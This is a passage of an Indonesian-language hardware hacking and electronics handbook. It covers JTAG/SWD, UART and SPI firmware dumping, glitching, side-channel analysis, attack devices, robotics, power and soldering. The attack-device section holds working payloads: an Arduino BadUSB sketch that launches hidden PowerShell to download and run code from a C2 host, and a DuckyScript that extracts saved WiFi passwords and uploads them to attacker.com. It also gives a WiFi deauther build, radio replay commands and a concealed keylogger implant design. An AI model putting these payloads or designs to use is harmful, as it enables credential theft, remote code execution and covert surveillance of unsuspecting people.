2. Physical : Bongkar enclosure, foto PCB, ID komponen
3. Recon : Identifikasi MCU, flash chip, debug interface
4. Access : UART console, JTAG/SWD, SPI dump
5. Firmware : Extract, analisis binwalk, strings, reverse
6. Vulnerability: Temukan bug, exploit
7. Persistence: Backdoor, implant, modifikasi firmwareIdentifikasi Komponen di PCB
Langkah-langkah identifikasi chips saat recon:
- IC marking: Baca tulisan di chip. Format: logo mfr + part number + date code + lot
- Googling marking: Cari langsung. Chips custom kadang diobfuskasi (marking palsu atau dihapus)
- Package inference: QFP-64 → MCU menengah. BGA → SoC kompleks. SOIC-8 → Flash/EEPROM/OpAmp
- FCC ID: Setiap produk wireless yang dijual di AS punya FCC ID — fccid.io menyimpan foto internal PCB
- Test points: Cari via exposed atau header 2–10 pin. Biasanya UART, JTAG, atau power
Alat Hardware Hacking Esensial
Debugging
J-Link / ST-Link V2
Programmer + debugger ARM JTAG/SWD. ST-Link V2 clone ~$3 dari AliExpress.
USB–Serial
CP2102 / CH340
USB ke UART adapter. CP2102 lebih stabil, CH340 murah. Wajib ada di toolkit.
Multi-Protocol
Bus Pirate v3/v4
UART, SPI, I2C, 1-Wire, JTAG dari satu device USB. Open source.
Logic Analyzer
Saleae / FX2LAFW
8–16 channel, decode UART/SPI/I2C/CAN secara real-time. Clone Saleae ~$10.
SPI Programmer
CH341A
Baca/tulis flash SPI (25xxx) dan EEPROM (24xxx). ~$5, support astrorom/flashrom.
Glitching
ChipWhisperer / DIY
Voltage/clock glitch platform. ChipWhisperer Lite ~$250. DIY dengan FPGA atau MCU cepat.
§ 13 — JTAG/SWD
JTAG & SWD Debug Access
Menemukan JTAG Pins (JTAGulator / Manual)
# Menggunakan JTAGulator (tool khusus)
# Hubungkan test points ke channel JTAGulator
# Set voltase target (1.8V / 3.3V / 5V)
# Run BYPASS scan untuk enumerate semua pin:
Target voltage: 3.3V
Number of channels: 8
Run BYPASS → otomatis scan kombinasi TCK/TMS/TDI/TDO
# Atau manual dengan oscilloscope/logic analyzer:
# Pin TCK: square wave saat aktif
# Pin TDO: output saat chain scan, perlu probe saat resetOpenOCD — Open On-Chip Debugger
# Install
sudo apt install openocd
# Koneksi ke STM32 via ST-Link + SWD
openocd -f interface/stlink.cfg -f target/stm32f1x.cfg
# Di telnet (port 4444) atau GDB (port 3333):
telnet localhost 4444
# Di OpenOCD CLI:
> halt # Halt CPU
> reg # Lihat semua registers
> mdw 0x08000000 32 # Dump 32 words dari flash
> dump_image fw.bin 0x08000000 0x20000 # Dump firmware
> flash write_image erase patched.bin 0x08000000 # Flash firmware
> reset runMengatasi Read Protection (RDP)
| RDP Level | STM32 | Deskripsi | Bypass |
|---|---|---|---|
| Level 0 | Tidak ada proteksi | Flash dapat dibaca bebas | — |
| Level 1 | Read protect | Debug interface diblokir. Flash tidak bisa di-dump via JTAG | Voltage glitch, cold boot attack, decap+probe |
| Level 2 | Chip protect | Debug interface permanen disabled, tidak bisa di-reset | Decap+FIB+microprobing, difasilitasi fault injection |
⚡ Voltage Glitch bypass RDP1
Beberapa STM32 series rentan terhadap voltage glitch pada VDD saat boot — CPU membaca RDP byte sebelum full protection aktif. Timing glitch pada nanosecond level dapat bypass RDP1. Tools: ChipWhisperer, custom FPGA dengan delay presisi. CVE tersedia untuk beberapa chip families.
§ 14 — UART Console
UART / Serial Console Access
Workflow UART Console Attack
1. Identifikasi & konfirmasi pins (lihat §06 di atas)
2. Sambungkan USB-UART adapter:
Device TX → Adapter RX
Device RX → Adapter TX
Device GND → Adapter GND
JANGAN hubungkan VCC kecuali device tidak punya power!
Pastikan level voltage match (3.3V device + 5V adapter = RUSAK)
3. Tentukan baud rate jika tidak diketahui:
# Hitung secara manual dari oscilloscope:
# Baud = 1 / (lebar bit terpendek dalam detik)
# Atau coba automated dengan minicom/putty
# Baud rate umum: 9600, 38400, 57600, 115200, 230400
4. Buka terminal:
screen /dev/ttyUSB0 115200
# atau
minicom -b 115200 -D /dev/ttyUSB0
5. Power on target — amati output bootHal yang Dicari di Boot Log
- OS version & kernel version
- U-Boot messages (bootloader) — sering bisa interrupt boot dengan key
- Filesystem mount points
- Network interface MAC & IP
- Error messages yang mengandung path, library, binary names
- Login prompt — coba default credentials (admin/admin, root/root, root/blank)
U-Boot Exploitation
# Interrupt U-Boot dengan tekan 'any key' saat countdown:
3... 2... 1... [tekan Enter/Space]
U-Boot >
# U-Boot commands berguna:
printenv # Lihat environment variables
setenv bootargs "... init=/bin/sh" # Boot ke shell
md.l 0x80000000 64 # Memory dump 64 words
mw.l 0x80000000 0x1234 # Memory write
nand read 0x81000000 0x0 0x100000 # Baca NAND flash ke RAM
tftp 0x81000000 firmware.bin # Load via TFTP§ 15 — Flash Dump
SPI Flash & EEPROM Dump
Identifikasi Flash Chip
Flash SPI NOR biasanya SOIC-8 atau WSON-8. Chip populer:
| Manufacturer | Part Series | Kapasitas | Interface |
|---|---|---|---|
| Winbond | W25Q16/32/64/128 | 2–16 MB | SPI (JEDEC) |
| Macronix | MX25L series | 1–256 MB | SPI (JEDEC) |
| Spansion/Cypress | S25FL series | 1–256 MB | SPI (JEDEC) |
| Microchip | SST25/26 | 1–8 MB | SPI |
| GigaDevice | GD25Q series | 1–128 MB | SPI |
Dump dengan CH341A + flashrom
# Install flashrom
sudo apt install flashrom
# Hubungkan clip SOIC-8 ke CH341A dan ke chip
# Pin assignment SOIC-8 (Winbond W25Q):
# 1=CS, 2=MISO(DO), 3=WP#, 4=GND, 5=MOSI(DI), 6=CLK, 7=HOLD#, 8=VCC
# Detect chip
flashrom -p ch341a_spi
# Dump firmware
flashrom -p ch341a_spi -r firmware_dump.bin
# Verifikasi dump (baca 2x, bandingkan)
flashrom -p ch341a_spi -r firmware_dump2.bin
md5sum firmware_dump.bin firmware_dump2.bin
# Tulis firmware termodifikasi
flashrom -p ch341a_spi -w modified_firmware.binAnalisis Firmware dengan binwalk
# Signature scan
binwalk firmware_dump.bin
# Extract semua filesystem/archive
binwalk -e firmware_dump.bin
# Recursive extract
binwalk -Me firmware_dump.bin
# Entropy analysis (detect encrypted sections)
binwalk -E firmware_dump.bin
# Output setelah extract: /root/_firmware_dump.bin.extracted/
# Cari: /etc/passwd, /etc/shadow, credentials, private keys, hardcoded creds
grep -r "password" ./_firmware_dump.bin.extracted/ 2>/dev/null
find . -name "*.pem" -o -name "*.key" -o -name "id_rsa"In-Circuit Dump (tanpa desoldering)
Chip dapat dibaca in-circuit jika MCU di-halt terlebih dahulu (via JTAG/SWD). Pastikan:
- Target system OFF atau MCU di-halt agar tidak conflict di SPI bus
- Pull CS line ke HIGH secara manual untuk isolasi sementara jika perlu
- Clip Pomona 5250 atau IC test clip 8-pin untuk akses non-destructive
§ 16 — Fault Injection
Fault Injection & Voltage Glitching
Konsep Fault Injection
Menyebabkan kesalahan sementara pada hardware untuk bypass proteksi, skip instruksi, atau corrupt critical data. Dua teknik utama:
Voltage Glitching
Injeksi singkat pada VCC — menyebabkan CPU miskompute instruksi. Target: saat membaca protection byte, saat check password, saat verifikasi signature.
Clock Glitching
Masukkan siklus clock ekstra atau hilangkan satu siklus. CPU mengeksekusi instruksi dengan state tidak valid. Lebih mudah timing-nya di beberapa target.
Parameter Glitch
| Parameter | Deskripsi | Nilai Tipikal |
|---|---|---|
| Glitch offset | Delay dari trigger ke glitch | Perlu sweep lebar |
| Glitch width | Durasi glitch (VCC drop) | 10–200 nanosecond |
| Glitch voltage | Seberapa jauh VCC diturunkan | Biasanya 50–80% normal VCC |
| Trigger | Kapan mulai glitch — IO event, power trace, atau timer | Rising edge UART TX, atau GPIO output target |
Setup Glitch DIY (Budget)
/* Minimal DIY glitch setup dengan MOSFET cepat */
/* N-Channel MOSFET (BSS138 atau AO3400) sebagai shunt ke GND */
Komponen:
- MOSFET N-CH: AO3400 atau BSS138
- Resistor gate: 10Ω (jaga stabilitas)
- Kapasitor decoupling: 10µF dekat target VCC
- MCU controller: STM32 atau RP2040 (resolusi timer ns)
Koneksi:
Target VCC ─── 10Ω ─── MOSFET Drain
MOSFET Source → GND
MOSFET Gate ← Controller GPIO (via 10Ω)
/* Pulse GPIO HIGH selama Tglitch nanoseconds */
/* Timing kritis — gunakan DMA atau hardware timer */§ 17 — Side Channel
Side-Channel Analysis (SCA)
Jenis Side-Channel Attack
| Tipe | Sinyal yang Diukur | Target Informasi | Tool |
|---|---|---|---|
| SPA (Simple Power) | Konsumsi arus VCC | Key bits, branching code | Shunt resistor + oscilloscope/ADC |
| DPA (Differential Power) | Konsumsi arus (statistical) | Kunci kriptografi AES/DES | ChipWhisperer + analisis DPA |
| EM (Electromagnetic) | Emisi RF dari IC | Kunci kriptografi, program flow | RF probe + oscilloscope |
| Timing | Waktu eksekusi | Secret comparison, operasi kriptografi | Logic analyzer, precise timer |
| Acoustic | Suara komponen | RSA operasi (kapasitor koil whine) | Microphone sensitif |
Setup Power Analysis Minimal
/* Shunt resistor method */
/* Pasang resistor 10–100Ω seri di jalur GND target */
/* Ukur tegangan drop = proportional ke arus = proportional ke aktivitas CPU */
Target GND ─── 10Ω shunt ─── GND
│
Oscilloscope CH1
(differential probe atau
probe CH1 dan CH2,
ukur differential)
/* Setup ChipWhisperer — lebih bersih: */
/* CWNano board punya built-in shunt + 10-bit/200MSps ADC */
/* Capture power trace saat target mengeksekusi crypto */DPA — Differential Power Analysis (Konsep)
/* DPA attack terhadap AES: */
1. Encrypt banyak plaintext acak (biasanya 1000–100000 traces)
2. Rekam power trace tiap operasi
3. Pilih target intermediate value (misal: output S-Box byte ke-0)
4. Untuk setiap kandidat key byte (0–255):
- Hitung prediksi intermediate value untuk tiap plaintext
- Bagi traces ke dua kelompok berdasarkan bit target
- Hitung difference-of-means
5. Kandidat key yang menghasilkan peak korelasi tertinggi = key byte yang benar§ 18 — Produk Hacking
Bad USB & HID Attack Devices
Prinsip Bad USB
USB HID (Human Interface Device) attack — perangkat menyamar sebagai keyboard/mouse, diterima OS tanpa driver khusus, mengirim keystroke otomatis.
Platform Bad USB
| Platform | MCU | Kecepatan | Fitur Extra | Form Factor |
|---|---|---|---|---|
| Rubber Ducky | AT32UC3 | 1000 wpm | Encrypted payload, SD card | USB-A flash drive |
| RP2040 (DigiSpark) | RP2040 | Sangat cepat | Dual core, PIO | Kecil, murah ~$3 |
| Flipper Zero | STM32WB55 | Medium | Multi-attack: RFID/BLE/IR/RF | Handheld |
| O.MG Cable | ESP8266/custom | Medium | WiFi implant di kabel USB | Kabel USB tipikal |
| Bash Bunny | Linux SoC | Fast | Mass storage, Ethernet, WiFi | USB-A stick besar |
Build DIY Bad USB — STM32F103 (BluePill)
/* STM32F103C8T6 (BluePill) sebagai HID keyboard */
/* Framework: Arduino + USB_HID library atau libopencm3 */
// Contoh payload sederhana (Arduino + Keyboard.h)
#include <Keyboard.h>
void setup() {
Keyboard.begin();
delay(1000); // Tunggu OS recognize device
// Windows: buka Run dialog, jalankan PowerShell
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(500);
Keyboard.print("powershell -w h -ep bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://c2/p')\");
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
}
void loop() {}Rubber Ducky Script (DuckyScript 3.0)
REM Exfil WiFi passwords via PowerShell
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -W Hidden -Exec Bypass
ENTER
DELAY 800
STRING (netsh wlan show profiles) | Select-String ':(.*)' | %{$n=$_.Matches.Groups[1].Value.Trim(); $p=(netsh wlan show profile name="$n" key=clear) -match 'Key Content.*: (.*)'; if($p){Write-Output "$n : $(($p[0] -split ':')[1].Trim())"}} | Out-File $env:TEMP\w.txt; curl -F 'f=@$env:TEMP\w.txt' https://attacker.com/u
ENTER§ 19 — WiFi Attack
WiFi Attack Hardware
Platform WiFi Attack
| Platform | Chip WiFi | Kapabilitas | Harga Approx |
|---|---|---|---|
| WiFi Pineapple | AR9331 + AR9887 | Evil twin, MITM, deauth, karma attack | ~$120 (ori) |
| ESP32 deauther | ESP32 | Deauth, beacon flood, probe flood | ~$5 modul |
| Alfa AWUS036ACH | RTL8812AU | Monitor mode + injection, dual-band | ~$40 |
| Raspberry Pi + adapter | Various | Full attack platform, hostapd evil AP | Varies |
Build DIY Deauther dengan ESP8266
/* ESP8266 Deauther — firmware: github.com/SpacehuhnTech/esp8266_deauther */
/* Upload firmware via Arduino IDE + ESP8266 board package */
/* Interface: WiFi AP "pwned" atau Serial CLI */
Board settings Arduino:
Board : NodeMCU 1.0 / Generic ESP8266 Module
Flash Size : 4MB (1MB SPIFFS)
Upload Speed: 115200
Setelah flash, connect ke AP "pwned" password "deauther"
Web interface di 192.168.4.1
Fitur: scan → pilih target → deauth/beacon/probe attackWiFi Adapter untuk Monitor Mode & Injection
| Adapter | Chipset | Monitor | Inject | Band |
|---|---|---|---|---|
| Alfa AWUS036ACH | RTL8812AU | ✓ | ✓ | 2.4 + 5 GHz |
| TP-Link WN722N v1 | AR9271 | ✓ | ✓ | 2.4 GHz saja |
| Alfa AWUS036NHA | AR9271 | ✓ | ✓ | 2.4 GHz saja |
| Alfa AWUS1900 | RTL8814AU | ✓ | ✓ | Dual band, 4 antena |
§ 20 — SDR & SIGINT
SDR & SIGINT Collection
Setup SIGINT dengan RTL-SDR + GNU Radio / SDR#
# Install GNU Radio + RTL-SDR drivers (Linux)
sudo apt install gnuradio rtl-sdr gr-osmosdr
# Test RTL-SDR
rtl_test -t
# Capture raw IQ sample ke file
rtl_sdr -f 433920000 -s 2000000 -g 40 capture.iq
# Decode berbagai protokol dengan multimode:
rtl_433 -f 433920000 # Auto-decode ISM 433MHz devices
dump1090 --interactive # ADS-B (aircraft tracking)
rtl_fm -f 100.1e6 -M wbfm -r 44100 | aplay -r 44100 -f S16_LE # FM radioTarget Sinyal untuk SIGINT Research
| Target | Frekuensi | Modulasi | Tool Decode |
|---|---|---|---|
| FM Radio | 88–108 MHz | WBFM | rtl_fm, GQRX |
| ADS-B (Pesawat) | 1090 MHz | PPM | dump1090, tar1090 |
| AIS (Kapal) | 161.975/162.025 MHz | GMSK | rtl-ais |
| ACARS (Pesawat) | 129.125 MHz | AM + ACARS | acarsdec |
| Trunked Radio | Varies (DMR/P25/NXDN) | Digital | DSD+, OP25 |
| Remote 433MHz | 433.92 MHz | OOK/ASK | rtl_433, URH |
| Weather Sonde | 400–406 MHz | FSK | RS |
| NOAA Weather Sat | 137.1–137.9 MHz | APT/LRPT | WXtoImg, SATDUMP |
Replay Attack — Remote Controls
/* Capture dan replay sinyal remote 433MHz */
# Dengan HackRF One:
# Capture
hackrf_transfer -r capture.raw -f 433920000 -s 8000000 -l 40 -g 62
# Replay (transmit)
hackrf_transfer -t capture.raw -f 433920000 -s 8000000 -x 47
# Analisis dengan Universal Radio Hacker (URH)
# GUI tool untuk capture, analyze, decode, fuzzing protokol RF
pip3 install urh
urh # Launch GUI§ 21 — Multi-Tool Devices
Flipper-Class Multi-Attack Devices
Flipper Zero — Arsitektur Hardware
| Komponen | Part | Fungsi |
|---|---|---|
| MCU Utama | STM32WB55 | ARM Cortex-M4 + M0 coprocessor |
| Sub-GHz Radio | CC1101 | 300–928 MHz, ASK/OOK/FSK/GFSK/MSK |
| NFC | ST25R3916 | 13.56 MHz, ISO14443A/B, ISO15693, FeliCa |
| RFID 125kHz | Dedicated circuit | EM4100, HID, Indala clone/emulate |
| Bluetooth | STM32WB55 internal | BLE 5.0 |
| IR Transceiver | SFH4545 + TSOP75338 | TX/RX infrared, TV/AC remote |
| iButton | 1-Wire | Dallas key clone/emulate |
| GPIO | — | I2C, SPI, UART, 3.3V/5V |
| Display | 128×64 monochrome LCD | — |
Build Clone Flipper — Budget Alternative
Komponen untuk build multi-tool device sendiri:
| Komponen | Part | Harga | Fungsi |
|---|---|---|---|
| MCU | STM32WB55 atau ESP32-S3 | $5–15 | Core controller |
| Sub-GHz | CC1101 module | $2–5 | 315/433/868/915 MHz |
| NFC | PN532 module | $5–8 | 13.56 MHz RFID/NFC |
| RFID 125k | EM4100 reader coil + circuit | $3 | LF RFID |
| IR TX/RX | TSOP38238 + IR LED | $1 | Infrared |
| Display | SSD1306 128×64 OLED | $2 | Display |
| Battery | LiPo 1000mAh + TP4056 | $3 | Power |
| USB HID | Native USB di MCU | — | BadUSB capability |
§ 22 — Covert Hardware
Implant & Covert Hardware Design
Desain Implant Hardware — Prinsip
Perangkat implant dirancang untuk miniaturisasi, daya rendah, dan deteksi minimal:
- Ukuran minimal: Target PCB <20×20mm. Gunakan komponenBGA dan 0201/0402.
- Daya rendah: Sleep mode sebagian besar waktu. Wake on RF/trigger.
- RF covert: Transmit burst singkat. Frequency hop. Spread spectrum.
- Power harvesting: RF energy harvest (915MHz), USB VBUS, atau sel surya kecil.
- Tamper resistance: Epoxy encapsulation, mesh tamper detection.
Contoh Implant Platform Minimal
MINIMAL KEYLOGGER/EXFIL IMPLANT:
MCU : nRF52840 (ARM CM4, BLE 5.0, Ultra-low power)
Storage : W25Q32 SPI Flash (4MB keylog buffer)
Radio : Onboard BLE (native) + optional CC1101 SPI
Power : USB VBUS 5V → AMS1117-3.3 LDO → nRF
PCB : 4-layer, 18×22mm
/* Operasi: */
- Masuk antara keyboard USB dan host
- Log setiap keystroke ke SPI flash
- Expose BLE endpoint untuk dump via app
- Atau: inject ke WiFi AP terdekat via nRF Wifi (nRF7002)
/* Form factor: PCB terenkapulasi epoxy dalam enclosure mirip USB hub */⚠ Legal Notice
Pembuatan dan penggunaan implant hardware tanpa otorisasi merupakan tindakan ilegal di sebagian besar yurisdiksi. Informasi ini untuk keperluan authorized penetration testing, penelitian keamanan, dan pembuatan capability untuk institusi yang memiliki kewenangan hukum.
§ 23 — Robotika
Motor & Aktuator untuk Robotika
Jenis Motor
| Jenis | Kontrol | Keunggulan | Kelemahan | Aplikasi |
|---|---|---|---|---|
| DC Brushed | Tegangan/PWM + H-Bridge | Murah, sederhana, torsi tinggi | Brush aus, noise EMI | Robot sederhana, fan |
| DC Brushless (BLDC) | ESC atau FOC controller | Efisien, awet, rpm tinggi | Driver kompleks, mahal | Drone, mobil listrik, gimbal |
| Stepper | Step + direction pulse | Presisi posisi tanpa encoder | Vibration, lose step jika overload | CNC, 3D printer, actuator presisi |
| Servo RC | PWM 50Hz, 1–2ms pulse | Mudah, posisi terkontrol | Range terbatas (180°) | Robot arm, steering |
| Linear Actuator | DC motor + gearbox | Force besar, linear motion | Lambat | Door, press mechanism |
H-Bridge — Driver Motor DC
Sirkuit 4 switch yang memungkinkan motor berputar dua arah:
/* Konfigurasi H-Bridge */
VCC
SW1 │ SW2
────┼────
SW3 │ │ │ SW4
──┴─┴─┴──
GND
Forward : SW1+SW4 ON, SW2+SW3 OFF
Reverse : SW2+SW3 ON, SW1+SW4 OFF
Brake : SW1+SW2 ON atau SW3+SW4 ON
Coast : Semua OFF
/* IC H-Bridge populer: */
- L293D : 600mA/ch, 4.5–36V, internal dioda, 2 motor
- L298N : 2A/ch, 5–46V, populer untuk medium robot
- DRV8833 : 1.5A/ch, 2.7–10.8V, compact, low quiescent
- TB6612FNG: 1.2A/ch, 2.7–13.5V, efisien, compact
- BTS7960 : 43A, untuk motor besar (kendaraan)Stepper Motor Driver
| Driver IC | Arus Max | Microstepping | Interface |
|---|---|---|---|
| A4988 | 2A | 1/1, 1/2, 1/4, 1/8, 1/16 | STEP/DIR |
| DRV8825 | 2.5A | Hingga 1/32 | STEP/DIR |
| TMC2209 | 2A (2.8A peak) | Hingga 1/256, StealthChop | STEP/DIR + UART |
| TMC5160 | 3A | Hingga 1/256, SPI config | STEP/DIR + SPI |
Servo Control
/* Standard RC Servo: PWM 50Hz (20ms period) */
/* Pulse width menentukan posisi: */
/* 1ms (0°) ... 1.5ms (90°) ... 2ms (180°) */
// Arduino servo example
#include <Servo.h>
Servo myServo;
myServo.attach(9); // GPIO9
myServo.write(90); // 90 derajat
// STM32 HAL — PWM direct:
// TIM period = 20ms, pulse width = 1000–2000 us
TIM2->CCR1 = 1500; // 1.5ms = 90 degrees§ 24 — Sensor
Sensor & Persepsi Robot
Kategori Sensor
| Kategori | Sensor | Interface | Part Contoh |
|---|---|---|---|
| Jarak | Ultrasonik | Trig/Echo GPIO | HC-SR04 (2cm–400cm) |
| Jarak | IR ToF | I2C | VL53L0X, VL53L1X |
| Jarak | LiDAR | UART/SPI | TFmini, RPLiDAR A1 |
| IMU | Accelerometer + Gyro | I2C/SPI | MPU6050, ICM-42688, LSM6DSO |
| IMU | 9-DOF + Magnetometer | I2C | ICM-20948, BNO055 |
| Encoder | Incremental quadrature | GPIO interrupt | LPD3806, AS5600 (magnetic) |
| Suhu/Humidity | Digital | 1-Wire/I2C | DS18B20, DHT22, BME280 |
| Tekanan | Barometer | I2C | BMP280, MS5611 |
| Kamera | RGB/Grayscale | MIPI CSI/SPI | OV7670, ArduCam |
| GPS | GNSS | UART (NMEA) | u-blox NEO-M8N, BN-880 |
MPU6050 — IMU I2C
/* MPU6050: 3-axis accel + 3-axis gyro, DMP onboard */
/* I2C address: 0x68 (AD0=LOW) atau 0x69 (AD0=HIGH) */
/* Register penting: */
PWR_MGMT_1 = 0x6B // Wake up: write 0x00
ACCEL_XOUT_H = 0x3B // 6 bytes: AX, AY, AZ (big-endian 16-bit)
GYRO_XOUT_H = 0x43 // 6 bytes: GX, GY, GZ
TEMP_OUT_H = 0x41 // Temperature
/* Full-scale range */
Accel: ±2g / ±4g / ±8g / ±16g (default ±2g, LSB = 16384/g)
Gyro: ±250 / ±500 / ±1000 / ±2000 dps (default ±250, LSB = 131/(°/s))
/* Konversi: */
accel_x_ms2 = raw_x / 16384.0 × 9.81
gyro_x_dps = raw_x / 131.0§ 25 — Kontrol
Sistem Kontrol & PID
Kontrol Loop Dasar
/* Closed-loop control system */
Setpoint → [Controller] → [Plant/Actuator] → Output
↑ │
[Feedback] ←──────────────┘
(Sensor)PID Controller
Proportional–Integral–Derivative — controller paling umum digunakan dalam robotika dan industri.
u(t) = Kp×e(t) + Ki×∫e(t)dt + Kd×(de/dt)
| Term | Formula | Efek |
|---|---|---|
| Proportional (P) | Kp × e(t) | Output proporsional error. Kurangi rise time, tapi ada steady-state error. |
| Integral (I) | Ki × ∫e dt | Eliminasi steady-state error. Bisa menyebabkan overshoot dan wind-up. |
| Derivative (D) | Kd × de/dt | Prediksi error, kurangi overshoot, tapi amplifikasi noise. |
Implementasi PID Digital
typedef struct {
float Kp, Ki, Kd;
float integral, prev_error;
float output_min, output_max;
float dt; // sampling time (seconds)
} PID_t;
float PID_update(PID_t *pid, float setpoint, float measurement) {
float error = setpoint - measurement;
pid->integral += error × pid->dt;
/* Anti-windup clamp */
if (pid->integral > pid->output_max / pid->Ki)
pid->integral = pid->output_max / pid->Ki;
float derivative = (error - pid->prev_error) / pid->dt;
pid->prev_error = error;
float output = pid->Kp * error + pid->Ki * pid->integral + pid->Kd * derivative;
/* Clamp output */
if (output > pid->output_max) output = pid->output_max;
if (output < pid->output_min) output = pid->output_min;
return output;
}Tuning PID — Metode Ziegler-Nichols
METODE ZIEGLER-NICHOLS:
1. Set Ki=0, Kd=0
2. Naikkan Kp pelan-pelan sampai output berosilasi stabil
3. Catat: Ku (ultimate gain) dan Tu (period osilasi)
4. Set nilai PID berdasarkan tabel:
P only : Kp=0.5×Ku
PI : Kp=0.45×Ku, Ki=0.54×Ku/Tu
PID : Kp=0.6×Ku, Ki=1.2×Ku/Tu, Kd=3×Ku×Tu/40
/* Untuk robotika modern: gunakan Auto-tuning library */
/* atau trial-error: P → PI → PID */§ 26 — Power
Power Supply & Manajemen Baterai
Baterai LiPo / Li-Ion
| Parameter | Nilai | Catatan |
|---|---|---|
| Voltage nominal | 3.7V per cell | — |
| Voltage fully charged | 4.2V per cell | Jangan melebihi ini |
| Voltage cut-off | 3.0V per cell | Di bawah = kerusakan permanen |
| C rating | 1C = full charge/discharge dalam 1 jam | Drone LiPo: 25C–100C discharge |
| Charging current | 0.5C–1C aman | Max 2C untuk LiPo fast charge |
Charging IC — TP4056
IC charger LiPo populer untuk proyek DIY. Tegangan input 4–8V, output charge current max 1A (configurable via R_prog).
I_charge (mA) = 1000 / R_prog (kΩ)
Contoh: R_prog = 1.2kΩ → I_charge = 833mA. LED merah = charging, LED biru = selesai.
Fuel Gauge — MAX17048
/* IC fuel gauge I2C untuk estimasi SOC (State of Charge) */
/* I2C address: 0x36 */
/* Register VCELL (0x02): voltase baterai, 78.125 µV per LSB */
/* Register SOC (0x04): % charge, 1/256% per LSB */
uint16_t vcell_raw = i2c_read16(0x36, 0x02);
float voltage = (vcell_raw >> 4) × 0.00125; // Volts
uint16_t soc_raw = i2c_read16(0x36, 0x04);
float soc_pct = soc_raw / 256.0; // Percent 0–100Buck Converter — Hitung Nilai Komponen
/* Buck converter: Vin=12V, Vout=5V, Iout=2A, fsw=400kHz */
/* Duty cycle: */
D = Vout / Vin = 5/12 = 0.417 = 41.7%
/* Minimum induktansi (ripple current 20% Iout): */
ΔIL = 0.2 × 2A = 0.4A
L = (Vin - Vout) × D / (fsw × ΔIL)
L = (12-5) × 0.417 / (400000 × 0.4) = 18.2µH → pilih 22µH
/* Kapasitor output (ripple voltage 50mV): */
ΔV = ΔIL / (8 × fsw × Cout)
Cout = ΔIL / (8 × fsw × ΔV)
Cout = 0.4 / (8 × 400000 × 0.05) = 2.5µF → pilih 10µF (margin)§ 27 — Lab Tools
Peralatan Lab Elektronika
Oscilloscope
Instrumen paling penting untuk debug elektronika — menampilkan sinyal vs waktu.
| Spek | Entry Level | Recommended | Professional |
|---|---|---|---|
| Bandwidth | 50 MHz | 100–200 MHz | 500 MHz+ |
| Sample Rate | 1 GSa/s | 1–2 GSa/s | 5 GSa/s+ |
| Channels | 2 | 2–4 | 4+ |
| Contoh | DS1054Z ($300) | MSO5074 ($800) | MSO6 series |
| Budget DIY | Hantek 6022BE ($50) | — | — |
Logic Analyzer
Capture dan decode digital signals — UART, SPI, I2C, CAN, I2S, dll.
- Saleae Logic 8: 8 channel, 100MHz, software decode sangat lengkap (~$500)
- FX2LAFW clone: Saleae clone, 8 channel, $10–20, kompatibel Sigrok/PulseView
- DreamSourceLab DSLogic: 16 channel, 400MHz, $100
- Oscilloscope MSO: Mixed signal oscilloscope = scope + logic analyzer
Multimeter
| Fungsi | Cara Pakai | Catatan |
|---|---|---|
| DC Voltage | Probe merah ke +, hitam ke GND | Pilih range sedikit di atas perkiraan V |
| Continuity | Mode buzzer — beep = koneksi ada | Ideal untuk trace PCB, short detection |
| Resistansi | Komponen off, probe paralel | Komponen on-board bisa kasih bacaan salah |
| Diode | Probe merah ke anode | Tampilkan Vf — identifikasi dioda, LED |
| AC Voltage | Mode VAC | Jangan gunakan untuk sinyal frekuensi tinggi |
| DC Current | Seri di rangkaian, range A/mA | Meter rusak jika salah pasang — hati-hati! |
Bench Power Supply
Wajib punya adjustable DC supply untuk pengembangan:
- Spek minimal: 0–30V, 0–5A, CV/CC mode, display voltase+arus
- Recommended: Rigol DP832 (triple output, 30V/3A, 5V/3A, programmable)
- Budget: Korad KA3005P atau clone bench supply dari AliExpress
- Protip: Current limit ke arus minimal saat pertama menghidupkan PCB baru — proteksi dari short circuit
Software Analisis
| Tool | Fungsi |
|---|---|
| Sigrok / PulseView | Open-source logic analyzer frontend, decode banyak protokol |
| GNU Radio | SDR flowgraph — capture, process, decode RF signal |
| Audacity | Analisis sinyal audio, visualize AM/FM demodulasi |
| Ghidra / IDA | Reverse engineering firmware yang di-dump dari flash |
| binwalk | Firmware analysis, extract filesystem, entropy analysis |
| Wireshark | Capture + decode network — termasuk USB packet capture |
| OpenOCD | JTAG/SWD debugging, flash programming |
| QEMU | Emulasi firmware ARM/MIPS untuk analisis tanpa hardware |
§ 28 — Soldering
Soldering & Rework SMD
Pilihan Solder
| Jenis | Komposisi | Melting Point | Cocok untuk |
|---|---|---|---|
| Leaded 60/40 | Sn60/Pb40 | 183°C | Mudah, glossy, flow bagus |
| Leaded 63/37 | Sn63/Pb37 | 183°C (eutectic) | Kualitas terbaik, single melting point |
| Lead-free SAC305 | Sn96.5/Ag3/Cu0.5 | 217–221°C | RoHS, sedikit lebih keras soldernya |
| Bismuth low-temp | Sn42/Bi58 | 138°C | Rework komponen heat-sensitive |
Suhu Soldering Iron
| Task | Suhu (Leaded) | Suhu (Lead-free) |
|---|---|---|
| THT komponen umum | 310–330°C | 360–380°C |
| SMD 0402–0805 | 300–320°C | 340–360°C |
| QFP/TQFP (fine pitch) | 300–320°C | 340–360°C |
| Ground plane/heatsink | 350–370°C | 390–410°C |
| Kabel stranded | 320–350°C | 360–390°C |
Teknik Solder SMD Manual
SMD DRAG SOLDER (untuk QFP/TQFP):
1. Flux lebih pada semua pin
2. Tin (tinning) tip iron dengan sedikit solder
3. Fix komponen: solder 2 pin sudut berlawanan
4. Apply flux lebih ke semua pin
5. Drag iron perlahan di sepanjang baris pin (30–45°)
6. Bridge akan terbentuk → hapus dengan wick/braid
7. Clean flux residue dengan IPA + brush
REFLOW HOT AIR (untuk QFN/BGA):
1. Apply solder paste ke pad (syringe atau stencil)
2. Tempatkan komponen dengan tweezer + alignment
3. Hot air gun: 350–380°C, flow rendah, circular motion
4. Tunggu solder reflow — komponen akan self-align
5. Cek dengan loupe atau microscopeRework — Ganti IC SMD
PROSEDUR REMOVE IC dengan Hot Air:
1. Apply flux ke semua pin
2. Set hot air: 380–420°C (lead-free), flow 3–4
3. Panaskan merata dari atas/samping IC
4. Angkat dengan tweezer saat solder reflow (30–60 detik)
5. Bersihkan pad: wick + flux + iron
6. Verifikasi semua pad bersih dan flat
PASANG IC BARU:
1. Align pin 1 marker
2. Apply pasta flux ke pad
